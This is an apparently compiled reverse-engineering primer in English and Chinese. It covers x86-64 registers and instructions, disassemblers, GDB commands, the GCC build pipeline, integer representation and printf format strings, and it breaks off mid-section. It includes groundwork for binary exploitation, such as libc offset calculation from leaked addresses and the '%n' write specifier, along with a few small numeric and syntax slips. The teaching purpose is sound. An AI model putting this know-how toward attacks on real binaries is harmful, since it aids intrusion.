x86-64 or amd64 or i64 is a 64-bit Complex Instruction Set Computing (CISC) architecture. This basically means that the registers used for this architecture extend an extra 32 bits on Intel's x86 architecture. CISC means that a single instruction can do a bunch of different things at once such as memory accesses, register reads, etc. It is also a variable-length instruction set which means different instructions can be of diferent sizes ranging from 1 to 16 bytes long. And finally, x86-64 allows for multi-sized register access which means that you can access certain parts of a register that are different sizes.
x86-64 Registers
x86-64 registers behave similarly to other architectures. A key component of x86-64 registers is multi-sized access, meaning the register RAX can have its lower 32-bits accessed with EAX. The next lower 16 bits can be accessed with AX and the lowest 8 bits can be accessed with AL, allowing the computer to make optimizations that boost program execution.
x86-64 has plenty of registers, including rax, rbx, rcx, rdx, rdi, rsi, rsp, rip, r8-r15, and more! But some registers serve special purposes.
The special registers include: - RIP: the instruction pointer - RSP: the stack pointer - RBP: the base pointer
Instructions
An instruction represents a single operation for the CPU to perform.
There are different types of instructions including:
- Data movement:
mov rax, [rsp - 0x40]
- Arithmetic:
add rbx, rcx
- Control-flow:
jne 0x8000400
Because x86-64 is a CISC architecture, instructions can be quite complex for machine code such as repne scasb
which repeats up to ECX times over memory at EDI looking for NULL byte (0x00), decrementing ECX each byte (Essentially strlen() in a single instruction!)
It is important to remember that an instruction really is just memory, this idea will become useful with Return Oriented Programming or ROP.
Instructions, numbers, strings, everything! Always represented in hex.
add rax, rbx
mov rax, 0xdeadbeef
mov rax, [0xdeadbeef] == 67 48 8b 05 ef be ad de
"Hello" == 48 65 6c 6c 6f
== 48 01 d8
== 48 c7 c0 ef be ad de
Execution
What should the CPU execute? This is determined by the RIP register where IP means instruction pointer. Execution follows the pattern: fetch the instruction at the address in RIP, decode it, and run it.
Examples
mov rax, 0xdeadbeef
Here the operation mov
is moving the "immediate" 0xdeadbeef
into the register RAX
mov rax, [0xdeadbeef + rbx * 4]
Here the operation mov
is moving the data at the address of [0xdeadbeef + RBX*4]
into the register RAX
. When brackets are used, you can think of the program as getting the content from that effective address.
Example Execution
-> 0x0804000: mov eax, 0xdeadbeef Register Values:
0x0804005: mov ebx, 0x1234 RIP = 0x0804000
0x080400a: add, rax, rbx RAX = 0x0
0x080400d: inc rbx RBX = 0x0
0x0804010: sub rax, rbx RCX = 0x0
0x0804013: mov rcx, rax RDX = 0x0
0x0804000: mov eax, 0xdeadbeef Register Values:
-> 0x0804005: mov ebx, 0x1234 RIP = 0x0804005
0x080400a: add, rax, rbx RAX = 0xdeadbeef
0x080400d: inc rbx RBX = 0x0
0x0804010: sub rax, rbx RCX = 0x0
0x0804013: mov rcx, rax RDX = 0x0
0x0804000: mov eax, 0xdeadbeef Register Values:
0x0804005: mov ebx, 0x1234 RIP = 0x080400a
-> 0x080400a: add, rax, rbx RAX = 0xdeadbeef
0x080400d: inc rbx RBX = 0x1234
0x0804010: sub rax, rbx RCX = 0x0
0x0804013: mov rcx, rax RDX = 0x0
0x0804000: mov eax, 0xdeadbeef Register Values:
0x0804005: mov ebx, 0x1234 RIP = 0x080400d
0x080400a: add, rax, rbx RAX = 0xdeadd123
-> 0x080400d: inc rbx RBX = 0x1234
0x0804010: sub rax, rbx RCX = 0x0
0x0804013: mov rcx, rax RDX = 0x0
0x0804000: mov eax, 0xdeadbeef Register Values:
0x0804005: mov ebx, 0x1234 RIP = 0x0804010
0x080400a: add, rax, rbx RAX = 0xdeadd123
0x080400d: inc rbx RBX = 0x1235
-> 0x0804010: sub rax, rbx RCX = 0x0
0x0804013: mov rcx, rax RDX = 0x0
0x0804000: mov eax, 0xdeadbeef Register Values:
0x0804005: mov ebx, 0x1234 RIP = 0x0804013
0x080400a: add, rax, rbx RAX = 0xdeadbeee
0x080400d: inc rbx RBX = 0x1235
0x0804010: sub rax, rbx RCX = 0x0
-> 0x0804013: mov rcx, rax RDX = 0x0
0x0804000: mov eax, 0xdeadbeef Register Values:
0x0804005: mov ebx, 0x1234 RIP = 0x0804005
0x080400a: add, rax, rbx RAX = 0xdeadbeee
0x080400d: inc rbx RBX = 0x1235
0x0804010: sub rax, rbx RCX = 0xdeadbeee
0x0804013: mov rcx, rax RDX = 0x0
Control Flow
How can we express conditionals in x86-64? We use conditional jumps such as:
jnz <address>
je <address>
jge <address>
jle <address>
- etc.
They jump if their condition is true and just go to the next instruction otherwise. These conditionals are checking EFLAGS which are special registers that store flags on certain instructions such as add rax, rbx
which sets the o (overflow) flag if the sum is greater than a 64-bit register can hold, and wraps around. You can jump based on that with a jo
instruction. The most important thing to remember is the cmp instruction:
cmp rax, rbx
jle error
This assembly jumps if RAX <= RBX
Addresses
Memory acts similarly to a big array where the indices of this "array" are memory addresses. Remember from earlier:
mov rax, [0xdeadbeef]
The square brackets mean "get the data at this address". This is analogous to the C/C++ syntax: rax = *0xdeadbeef;
Disassemblers
A disassembler is a tool that breaks down a compiled program into machine code.
List of Disassemblers
- IDA
- Binary Ninja
- GNU Debugger (GDB)
- radare2
- Hopper
IDA
The Interactive Disassembler (IDA) is the industry standard for binary disassembly. IDA is capable of disassembling "virtually any popular file format". This makes it very useful to security researchers and CTF players who often need to analyze obscure files without knowing what they are or where they came from. IDA also features the industry-leading Hex-Rays decompiler which can convert assembly code back into a pseudo code-like format.
IDA also has a plugin interface which has been used to create some successful plugins that can make reverse engineering easier:
- https://github.com/google/binnavi
- https://github.com/yegord/snowman
- https://github.com/gaasedelen/lighthouse
- https://github.com/joxeankoret/diaphora
- https://github.com/REhints/HexRaysCodeXplorer
- https://github.com/osirislab/Fentanyl
Binary Ninja
Binary Ninja is an up-and-coming disassembler that attempts to bring a new, more programmatic approach to reverse engineering. Binary Ninja brings an improved plugin API and modern features to reverse engineering. While it's less popular or as old as IDA, Binary Ninja (often called binja) is quickly gaining ground and has a small community of dedicated users and followers.
Binja also has some community-contributed plugins which are collected here: https://github.com/Vector35/community-plugins
gdb
The GNU Debugger is a free and open-source debugger that also disassembles programs. It's capable as a disassembler, but most notably it is used by CTF players for its debugging and dynamic analysis capabilities.
gdb is often used in tandem with enhancement scripts like peda, pwndbg, and GEF
The GNU Debugger (GDB)
The GNU Debugger or GDB is a powerful debugger that allows for the step-by-step execution of a program. It can be used to trace program execution and is an important part of any reverse engineering toolkit.
Vanilla GDB
GDB without any modifications is unintuitive and obscures a lot of useful information. The plug-in pwndb solves a lot of these problems and makes for a much more pleasant experience. But if you are constrained and have to use vanilla gdb, here are several things to make your life easier.
Starting GDB
To execute GBD and attach it to a program simply run gdb [program]
Disassembly
(gdb) disassemble [address/symbol]
will display the disassembly for that function/frame
GDB will autocomplete functions, so saying (gdb) disas main
suffices if you'd like to see the disassembly of the main
View Disassembly During Execution
Another handy thing to see while stepping through a program is the disassembly of nearby instructions:
(gdb) display/[# of instructions]i $pc [± offset]
display
shows data with each step/[#]i
shows how much data in the format i for instruction$pc
means the pc, program counter, register[± offset]
allows you to specify how you would like the data offset from the current instruction
Example Usage
(gdb) display/10i $pc - 0x5
This command will show 10 instructions on screen with an offset from the next instruction of 5, giving us this display:
0x8048535 <main+6>: lock pushl -0x4(%ecx)
0x8048539 <main+10>: push %ebp
=> 0x804853a <main+11>: mov %esp,%ebp
0x804853c <main+13>: push %ecx
0x804853d <main+14>: sub $0x14,%esp
0x8048540 <main+17>: sub $0xc,%esp
0x8048543 <main+20>: push $0x400
0x8048548 <main+25>: call 0x80483a0 <malloc@plt>
0x804854d <main+30>: add $0x10,%esp
0x8048550 <main+33>: sub $0xc,%esp
Deleting Views
If for whatever reason, a view no long suits your needs simply call (gdb) info display
which will give you a list of active displays:
Auto-display expressions now in effect:
Num Enb Expression
1: y /10bi $pc-0x5
Then simply execute (gdb) delete display 1
and your execution will resume without the display.
Registers
In order to view the state of registers with vanilla gdb, you need to run the command info registers
which will display the state of all the registers:
eax 0xf77a6ddc -142971428
ecx 0xffe06b10 -2069744
edx 0xffe06b34 -2069708
ebx 0x0 0
esp 0xffe06af8 0xffe06af8
ebp 0x0 0x0
esi 0xf77a5000 -142979072
edi 0xf77a5000 -142979072
eip 0x804853a 0x804853a <main+11>
eflags 0x286 [ PF SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
If you simply would like to see the contents of a single register, the notation x/x $[register]
where:
x/x
means to display the address in hex notation$[register]
is the register code such as eax, rax, etc.
Pwndbg
These commands work with vanilla gdb as well.
Setting Breakpoints
Setting breakpoints in GDB uses the format b*[Address/Symbol]
Example Usage
(gdb) b*main
: Break at the start(gdb) b*0x804854d
: Break at 0x804854d(gdb) b*0x804854d-0x100
: Break at 0x804844d
Deleting Breakpoints
As before, in order to delete a view, you can list the available breakpoints using (gdb) info breakpoints
(don't forget about GDB's autocomplete, you don't always need to type out every command!) which will display all breakpoints:
Num Type Disp Enb Address What
1 breakpoint keep y 0x0804852f <main>
3 breakpoint keep y 0x0804864d <__libc_csu_init+61>
Then simply execute (gdb) delete 1
Note
GDB creates breakpoints chronologically and does NOT reuse numbers.
Stepping
What good is a debugger if you can't control where you are going? In order to begin the execution of a program, use the command r [arguments]
similar to how if you ran it with dot-slash notation you would execute it ./program [arguments]
. In this case, the program will run normally and if no breakpoints are set, you will execute normally. If you have breakpoints set, you will stop at that instruction.
(gdb) continue [# of breakpoints]
: Resumes the execution of the program until it finishes or until another breakpoint is hit (shorthandc
)(gdb) step[# of instructions]
: Steps into an instruction the specified number of times, default is 1 (shorthands
)(gdb) next instruction [# of instructions]
: Steps over an instruction meaning it will not delve into called functions (shorthandni
)(gdb) finish
: Finishes a function and breaks after it gets returned (shorthandfin
)
Examining
Examining data in GDB is also very useful for seeing how the program is affecting data. The notation may seem complex at first, but it is flexible and provides powerful functionality.
(gdb) x/[#][size][format] [Address/Symbol/Register][± offset]
x/
means examine[#]
means how much[size]
means what size the data should be such as a word w (2 bytes), double word d (4 bytes), or giant word g (8 bytes)[format]
means how the data should be interpreted such as an instruction i, a string s, hex bytes x[Address/Symbol][± offset]
means where to start interpreting the data
Example Usage
(gdb) x/x $rax
: Displays the content of the register RAX as hex bytes(gdb) x/i 0xdeadbeef
: Displays the instruction at address 0xdeadbeef(gdb) x/10s 0x893e10
: Displays 10 strings at the address(gdb) x/10gx 0x7fe10
: Displays 10 giant words as hex at the address
Forking
If the program happens to be an accept-and-fork server, gdb will have issues following the child or parent processes. In order to specify how you want gdb to function you can use the command set follow-fork-mode [on/off]
Setting Data
If you would like to set data at any point, it is possible using the command set [Address/Register]=[Hex Data]
Example Usage
set $rax=0x0
: Sets the register rax to 0set 0x1e4a70=0x123
: Sets the data at 0x1e4a70 to 0x123
Process Mapping
A handy way to find the process's mapped address spaces is to use info proc map
:
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x8048000 0x8049000 0x1000 0x0 /directory/program
0x8049000 0x804a000 0x1000 0x0 /directory/program
0x804a000 0x804b000 0x1000 0x1000 /directory/program
0xf75cb000 0xf75cc000 0x1000 0x0
0xf75cc000 0xf7779000 0x1ad000 0x0 /lib32/libc-2.23.so
0xf7779000 0xf777b000 0x2000 0x1ac000 /lib32/libc-2.23.so
0xf777b000 0xf777c000 0x1000 0x1ae000 /lib32/libc-2.23.so
0xf777c000 0xf7780000 0x4000 0x0
0xf778b000 0xf778d000 0x2000 0x0 [vvar]
0xf778d000 0xf778f000 0x2000 0x0 [vdso]
0xf778f000 0xf77b1000 0x22000 0x0 /lib32/ld-2.23.so
0xf77b1000 0xf77b2000 0x1000 0x0
0xf77b2000 0xf77b3000 0x1000 0x22000 /lib32/ld-2.23.so
0xf77b3000 0xf77b4000 0x1000 0x23000 /lib32/ld-2.23.so
0xffc59000 0xffc7a000 0x21000 0x0 [stack]
This will show you where the stack, heap (if there is one), and libc are located.
Attaching Processes
Another useful feature of GDB is to attach to processes that are already running. Simply launch gdb using gdb
, then find the process id of the program you would like to attach to an execute attach [pid]
.
逆向工程与汇编语言
C 语言基础
从源代码到可执行文件
我们以经典著作《The C Programming Language》中的第一个程序 “Hello World” 为例,讲解 Linux 下 GCC 的编译过程。
#include <stdio.h>
main()
{
printf("hello, world\n");
}
$gcc hello.c
$./a.out
hello world
以上过程可分为4个步骤:预处理(Preprocessing)、编译(Compilation)、汇编(Assembly)和链接(Linking)。
预编译
gcc -E hello.c -o hello.i
# 1 "hello.c"
# 1 "<built-in>"
# 1 "<command-line>"
......
extern int printf (const char *__restrict __format, ...);
......
main() {
printf("hello, world\n");
}
预编译过程主要处理源代码中以 “#” 开始的预编译指令:
- 将所有的 “#define” 删除,并且展开所有的宏定义。
- 处理所有条件预编译指令,如 “#if”、“#ifdef”、“#elif”、“#else”、“#endif”。
- 处理 “#include” 预编译指令,将被包含的文件插入到该预编译指令的位置。注意,该过程递归执行。
- 删除所有注释。
- 添加行号和文件名标号。
- 保留所有的 #pragma 编译器指令。
编译
gcc -S hello.c -o hello.s
.file "hello.c"
.section .rodata
.LC0:
.string "hello, world"
.text
.globl main
.type main, @function
main:
.LFB0:
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
movq %rsp, %rbp
.cfi_def_cfa_register 6
leaq .LC0(%rip), %rdi
call puts@PLT
movl $0, %eax
popq %rbp
.cfi_def_cfa 7, 8
ret
.cfi_endproc
.LFE0:
.size main, .-main
.ident "GCC: (GNU) 7.2.0"
.section .note.GNU-stack,"",@progbits
编译过程就是把预处理完的文件进行一系列词法分析、语法分析、语义分析及优化后生成相应的汇编代码文件。
汇编
$ gcc -c hello.s -o hello.o
或者
$gcc -c hello.c -o hello.o
$ objdump -sd hello.o
hello.o: file format elf64-x86-64
Contents of section .text:
0000 554889e5 488d3d00 000000e8 00000000 UH..H.=.........
0010 b8000000 005dc3 .....].
Contents of section .rodata:
0000 68656c6c 6f2c2077 6f726c64 00 hello, world.
Contents of section .comment:
0000 00474343 3a202847 4e552920 372e322e .GCC: (GNU) 7.2.
0010 3000 0.
Contents of section .eh_frame:
0000 14000000 00000000 017a5200 01781001 .........zR..x..
0010 1b0c0708 90010000 1c000000 1c000000 ................
0020 00000000 17000000 00410e10 8602430d .........A....C.
0030 06520c07 08000000 .R......
Disassembly of section .text:
0000000000000000 <main>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: 48 8d 3d 00 00 00 00 lea 0x0(%rip),%rdi # b <main+0xb>
b: e8 00 00 00 00 callq 10 <main+0x10>
10: b8 00 00 00 00 mov $0x0,%eax
15: 5d pop %rbp
16: c3 retq
汇编器将汇编代码转变成机器可以执行的指令。
链接
gcc hello.o -o hello
$ objdump -d -j .text hello
......
000000000000064a <main>:
64a: 55 push %rbp
64b: 48 89 e5 mov %rsp,%rbp
64e: 48 8d 3d 9f 00 00 00 lea 0x9f(%rip),%rdi # 6f4 <_IO_stdin_used+0x4>
655: e8 d6 fe ff ff callq 530 <puts@plt>
65a: b8 00 00 00 00 mov $0x0,%eax
65f: 5d pop %rbp
660: c3 retq
661: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
668: 00 00 00
66b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
......
目标文件需要链接一大堆文件才能得到最终的可执行文件(上面只展示了链接后的 main 函数,可以和 hello.o 中的 main 函数作对比)。链接过程主要包括地址和空间分配(Address and Storage Allocation)、符号决议(Symbol Resolution)和重定向(Relocation)等。
gcc 技巧
通常在编译后只会生成一个可执行文件,而中间过程生成的 .i
、.s
、.o
文件都不会被保存。我们可以使用参数 -save-temps
永久保存这些临时的中间文件。
$ gcc -save-temps hello.c
$ ls
a.out hello.c hello.i hello.o hello.s
这里要注意的是,gcc 默认使用动态链接,所以这里生成的 a.out 实际上是共享目标文件。
$ file a.out
a.out: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=533aa4ca46d513b1276d14657ec41298cafd98b1, not stripped
使用参数 --verbose
可以输出 gcc 详细的工作流程。
gcc hello.c -static --verbose
东西很多,我们主要关注下面几条信息:
$ /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/cc1 -quiet -v hello.c -quiet -dumpbase hello.c -mtune=generic -march=x86-64 -auxbase hello -version -o /tmp/ccj1jUMo.s
as -v --64 -o /tmp/ccAmXrfa.o /tmp/ccj1jUMo.s
/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/collect2 -plugin /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/liblto_plugin.so -plugin-opt=/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/lto-wrapper -plugin-opt=-fresolution=/tmp/cc1l5oJV.res -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lgcc_eh -plugin-opt=-pass-through=-lc --build-id --hash-style=gnu -m elf_x86_64 -static /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crt1.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crti.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/crtbeginT.o -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0 -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib -L/lib/../lib -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../.. /tmp/ccAmXrfa.o --start-group -lgcc -lgcc_eh -lc --end-group /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/crtend.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crtn.o
三条指令分别是 cc1
、as
和 collect2
,cc1 是 gcc 的编译器,将 .c
文件编译为 .s
文件,as 是汇编器命令,将 .s
文件汇编成 .o
文件,collect2 是链接器命令,它是对命令 ld 的封装。静态链接时,gcc 将 C 语言运行时库的 5 个重要目标文件 crt1.o
、crti.o
、crtbeginT.o
、crtend.o
、crtn.o
和 -lgcc
、-lgcc_eh
、-lc
表示的 3 个静态库链接到可执行文件中。
更多的内容我们会在 1.5.3 中专门对 ELF 文件进行讲解。
C 语言标准库
C 运行库(CRT)是一套庞大的代码库,以支撑程序能够正常地运行。其中 C 语言标准库占据了最主要地位。
常用的标准库文件头:
- 标准输入输出(stdio.h)
- 字符操作(ctype.h)
- 字符串操作(string.h)
- 数学函数(math.h)
- 实用程序库(stdlib.h)
- 时间/日期(time.h)
- 断言(assert.h)
- 各种类型上的常数(limits.h & float.h)
- 变长参数(stdarg.h)
- 非局部跳转(setjmp.h)
glibc 即 GNU C Library,是为 GNU 操作系统开发的一个 C 标准库。glibc 主要由两部分组成,一部分是头文件,位于 /usr/include
;另一部分是库的二进制文件。二进制文件部分主要是 C 语言标准库,有动态和静态两个版本,动态版本位于 /lib/libc.so.6
,静态版本位于 /usr/lib/libc.a
。
在漏洞利用的过程中,通常我们通过计算目标函数地址相对于已知函数地址在同一个 libc 中的偏移,来获得目标函数的虚拟地址,这时我们需要让本地的 libc 版本和远程的 libc 版本相同,可以先泄露几个函数的地址,然后在 libcdb.com 中进行搜索来得到。
整数表示
默认情况下,C 语言中的数字是有符号数,下面我们声明一个有符号整数和无符号整数:
int var1 = 0;
unsigned int var2 = 0;
- 有符号整数
- 可以表示为正数或负数
int
的范围:-2,147,483,648 ~ 2,147,483,647
- 无符号整数
- 只能表示为零或正数
unsigned int
的范围:0 ~ 4,294,967,295
signed
或者 unsigned
取决于整数类型是否可以携带标志 +/-
:
- Signed
- int
- signed int
- long
- Unsigned
- unit
- unsigned int
- unsigned long
在 signed int
中,二进制最高位被称作符号位,符号位被设置为 1
时,表示值为负,当设置为 0
时,值为非负:
- 0x7FFFFFFF = 2147493647
- 01111111111111111111111111111111
- 0x80000000 = -2147483647
- 10000000000000000000000000000000
- 0xFFFFFFFF = -1
- 11111111111111111111111111111111
二进制补码以一种适合于二进制加法器的方式来表示负数,当一个二进制补码形式表示的负数和与它的绝对值相等的正数相加时,结果为 0。首先以二进制方式写出正数,然后对所有位取反,最后加 1 就可以得到该数的二进制补码:
eg: 0x00123456
= 1193046
= 00000000000100100011010001010110
~= 11111111111011011100101110101001
+= 11111111111011011100101110101010
= -1193046 (0xFFEDCBAA)
编译器需要根据变量类型信息编译成相应的指令:
- 有符号指令
- IDIV:带符号除法指令
- IMUL:带符号乘法指令
- SAL:算术左移指令(保留符号)
- SAR:右移右移指令(保留符号)
- MOVSX:带符号扩展传送指令
- JL:当小于时跳转指令
- JLE:当小于或等于时跳转指令
- JG:当大于时跳转指令
- JGE:当大于或等于时跳转指令
- 无符号指令
- DIV:除法指令
- MUL:乘法指令
- SHL:逻辑左移指令
- SHR:逻辑右移指令
- MOVZX:无符号扩展传送指令
- JB:当小于时跳转指令
- JBE:当小于或等于时跳转指令
- JA:当大于时跳转指令
- JAE:当大于或等于时跳转指令
32 位机器上的整型数据类型,不同的系统可能会有不同:
C 数据类型 | 最小值 | 最大值 | 最小大小 |
---|---|---|---|
char | -128 | 127 | 8 bits |
short | -32 768 | 32 767 | 16 bits |
int | -2 147 483 648 | 2 147 483 647 | 16 bits |
long | -2 147 483 648 | 2 147 483 647 | 32 bits |
long long | -9 223 372 036 854 775 808 | 9 223 372 036 854 775 807 | 64 bits |
固定大小的数据类型:
-
int [# of bits]_t
- int8_t, int16_t, int32_t
-
uint[# of bits]_t
- uint8_t, uint16_t, uint32_t
-
有符号整数
-
无符号整数
更多信息在 stdint.h
和 limits.h
中:
man stdint.h
cat /usr/include/stdint.h
man limits.h
cat /usr/include/limits.h
了解整数的符号和大小是很有用的,在后面的相关章节中我们会介绍整数溢出的内容。
格式化输出函数
C 标准中定义了下面的格式化输出函数(参考 man 3 printf
):
#include <stdio.h>
int printf(const char *format, ...);
int fprintf(FILE *stream, const char *format, ...);
int dprintf(int fd, const char *format, ...);
int sprintf(char *str, const char *format, ...);
int snprintf(char *str, size_t size, const char *format, ...);
#include <stdarg.h>
int vprintf(const char *format, va_list ap);
int vfprintf(FILE *stream, const char *format, va_list ap);
int vdprintf(int fd, const char *format, va_list ap);
int vsprintf(char *str, const char *format, va_list ap);
int vsnprintf(char *str, size_t size, const char *format, va_list ap);
fprintf()
按照格式字符串的内容将输出写入流中。三个参数为流、格式字符串和变参列表。printf()
等同于fprintf()
,但是它假定输出流为stdout
。sprintf()
等同于fprintf()
,但是输出不是写入流而是写入数组。在写入的字符串末尾必须添加一个空字符。snprintf()
等同于sprintf()
,但是它指定了可写入字符的最大值size
。当size
大于零时,输出字符超过第size-1
的部分会被舍弃而不会写入数组中,在写入数组的字符串末尾会添加一个空字符。dprintf()
等同于fprintf()
,但是它输出不是流而是一个文件描述符fd
。vfprintf()
、vprintf()
、vsprintf()
、vsnprintf()
、vdprintf()
分别与上面的函数对应,只是它们将变参列表换成了va_list
类型的参数。
格式字符串
格式字符串是由普通字符(ordinary character)(包括 %
)和转换规则(conversion specification)构成的字符序列。普通字符被原封不动地复制到输出流中。转换规则根据与实参对应的转换指示符对其进行转换,然后将结果写入输出流中。
一个转换规则有可选部分和必需部分组成:
%[ 参数 ][ 标志 ][ 宽度 ][ .精度 ][ 长度 ] 转换指示符
- (必需)转换指示符
字符 | 描述 |
---|---|
d , i | 有符号十进制数值 int 。'%d ' 与 '%i ' 对于输出是同义;但对于 scanf() 输入二者不同,其中 %i 在输入值有前缀 0x 或 0 时,分别表示 16 进制或 8 进制的值。如果指定了精度,则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0,则输出为空 |
u | 十进制 unsigned int 。如果指定了精度,则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0,则输出为空 |
f , F | double 型输出 10 进制定点表示。'f ' 与 'F ' 差异是表示无穷与 NaN 时,'f ' 输出 'inf ', 'infinity ' 与 'nan ';'F ' 输出 'INF ', 'INFINITY ' 与 'NAN '。小数点后的数字位数等于精度,最后一位数字四舍五入。精度默认为 6。如果精度为 0 且没有 # 标记,则不出现小数点。小数点左侧至少一位数字 |
e , E | double 值,输出形式为 10 进制的([- ]d.ddd e [+ /- ]ddd). E 版本使用的指数符号为 E (而不是e )。指数部分至少包含 2 位数字,如果值为 0,则指数部分为 00。Windows 系统,指数部分至少为 3 位数字,例如 1.5e002,也可用 Microsoft 版的运行时函数 _set_output_format 修改。小数点前存在 1 位数字。小数点后的数字位数等于精度。精度默认为 6。如果精度为 0 且没有 # 标记,则不出现小数点 |
g , G | double 型数值,精度定义为全部有效数字位数。当指数部分在闭区间 [-4,精度] 内,输出为定点形式;否则输出为指数浮点形式。'g ' 使用小写字母,'G ' 使用大写字母。小数点右侧的尾数 0 不被显示;显示小数点仅当输出的小数部分不为 0 |
x , X | 16 进制 unsigned int 。'x ' 使用小写字母;'X ' 使用大写字母。如果指定了精度,则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0,则输出为空 |
o | 8 进制 unsigned int 。如果指定了精度,则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0,则输出为空 |
s | 如果没有用 l 标志,输出 null 结尾字符串直到精度规定的上限;如果没有指定精度,则输出所有字节。如果用了 l 标志,则对应函数参数指向 wchar_t 型的数组,输出时把每个宽字符转化为多字节字符,相当于调用 wcrtomb 函数 |
c | 如果没有用 l 标志,把 int 参数转为 unsigned char 型输出;如果用了 l 标志,把 wint_t 参数转为包含两个元素的 wchart_t 数组,其中第一个元素包含要输出的字符,第二个元素为 null 宽字符 |
p | void * 型,输出对应变量的值。printf("%p", a) 用地址的格式打印变量 a 的值,printf("%p", &a) 打印变量 a 所在的地址 |
a , A | double 型的 16 进制表示,"[−]0xh.hhhh p±d"。其中指数部分为 10 进制表示的形式。例如:1025.010 输出为 0x1.004000p+10。'a ' 使用小写字母,'A ' 使用大写字母 |
n | 不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量 |
% | '% ' 字面值,不接受任何除了 参数 以外的部分 |
- (可选)参数
字符 | 描述 |
---|---|
n$ | n 是用这个格式说明符显示第几个参数;这使得参数可以输出多次,使用多个格式说明符,以不同的顺序输出。如果任意一个占位符使用了 参数 ,则其他所有占位符必须也使用 参数 。例:printf("%2$d %2$#x; %1$d %1$#x",16,17) 产生 "17 0x11; 16 0x10 " |
- (可选)标志
字符 | 描述 |
---|---|
+ | 总是表示有符号数值的 '+ ' 或 '- ' 号,缺省情况是忽略正数的符号。仅适用于数值类型 |
空格 | 使得有符号数的输出如果没有正负号或者输出 0 个字符,则前缀 1 个空格。如果空格与 '+ ' 同时出现,则空格说明符被忽略 |
- | 左对齐。缺省情况是右对齐 |
# | 对于 'g ' 与 'G ',不删除尾部 0 以表示精度。对于 'f ', 'F ', 'e ', 'E ', 'g ', 'G ', 总是输出小数点。对于 'o ', 'x ', 'X ', 在非 0 数值前分别输出前缀 0 , 0x 和 0X 表示数制 |
0 | 如果 宽度 选项前缀为 0 ,则在左侧用 0 填充直至达到宽度要求。例如 printf("%2d", 3) 输出 "3 ",而 printf("%02d", 3) 输出 "03 "。如果 0 与 - 均出现,则 0 被忽略,即左对齐依然用空格填充 |
- (可选)宽度
是一个用来指定输出字符的最小个数的十进制非负整数。如果实际位数多于定义的宽度,则按实际位数输出;如果实际位数少于定义的宽度则补以空格或 0。
- (可选)精度
精度是用来指示打印字符个数、小数位数或者有效数字个数的非负十进制整数。对于 d
、i
、u
、x
、o
的整型数值,是指最小数字位数,不足的位要在左侧补 0,如果超过也不截断,缺省值为 1。对于 a
, A
, e
, E
, f
, F
的浮点数值,是指小数点右边显示的数字位数,必要时四舍五入;缺省值为 6。对于 g
, G
的浮点数值,是指有效数字的最大位数。对于 s
的字符串类型,是指输出的字节的上限,超出限制的其它字符将被截断。如果域宽为 *
,则由对应的函数参数的值为当前域宽。如果仅给出了小数点,则域宽为 0。
- (可选)长度
字符 | 描述 |
---|---|
hh | 对于整数类型,printf 期待一个从 char 提升的 int 整型参数 |
h | 对于整数类型,printf 期待一个从 short 提升的 int 整型参数 |
l | 对于整数类型,printf 期待一个 long 整型参数。对于浮点类型,printf 期待一个 double 整型参数。对于字符串 s 类型,printf 期待一个 wchar_t 指针参数。对于字符 c 类型,printf 期待一个 wint_t 型的参数 |
ll | 对于整数类型,printf 期待一个 long long 整型参数。Microsoft 也可以使用 I64 |
L | 对于浮点类型,printf 期待一个 long double 整型参数 |
z | 对于整数类型,printf 期待一个 size_t 整型参数 |
j | 对于整数类型,printf 期待一个 intmax_t 整型参数 |
t | 对于整数类型,printf 期待一个 ptrdiff_t 整型参数 |
例子
printf("Hello %%"); // "Hello %"
printf("Hello World!"); // "Hello World!"
printf("Number: %d", 123); // "Number: 123"
printf("%s %s", "Format", "Strings"); // "Format Strings"
printf("%12c", 'A'); // " A"
printf("%16s", "Hello"); // " Hello!"
int n;
printf("%12c%n", 'A', &n); // n = 12
printf("%16s%n", "Hello!", &n); // n = 16
printf("%2$s %1$s", "Format", "Strings"); // "Strings Format"
printf("%42c%1$n", &n); // 首先输出41个空格,然后输出 n 的低八位地址作为一个字符
这里我们对格式化输出函数和格式字符串有了一个详细的认识,后面的章节中我们会介绍格式化字符串漏洞的内容。
汇编语言
- 汇编语言
- 3.3 X86 汇编基础
- 3.3.2 寄存器 Registers
- 3.3.3 内存和寻址模式 Memory and Addressing Modes
- 3.3.4 指令 Instructions
- 3.3.5 调用约定 Calling Convention
- 3.4 x64 汇编基础
- 3.4.1 导语
- 3.4.2 寄存器 Registers
- 3.4.3 寻址模式 Addressing modes
- 3.4.4 通用指令 Common instructions
- 3.5 ARM汇编基础
- 3.6 MIPS汇编基础
- 3.3 X86 汇编基础
3.3 X86 汇编基础
3.3.2 寄存器 Registers
现代 ( 386及以上的机器 )x86 处理器有 8 个 32 位通用寄存器, 如图 1 所示.
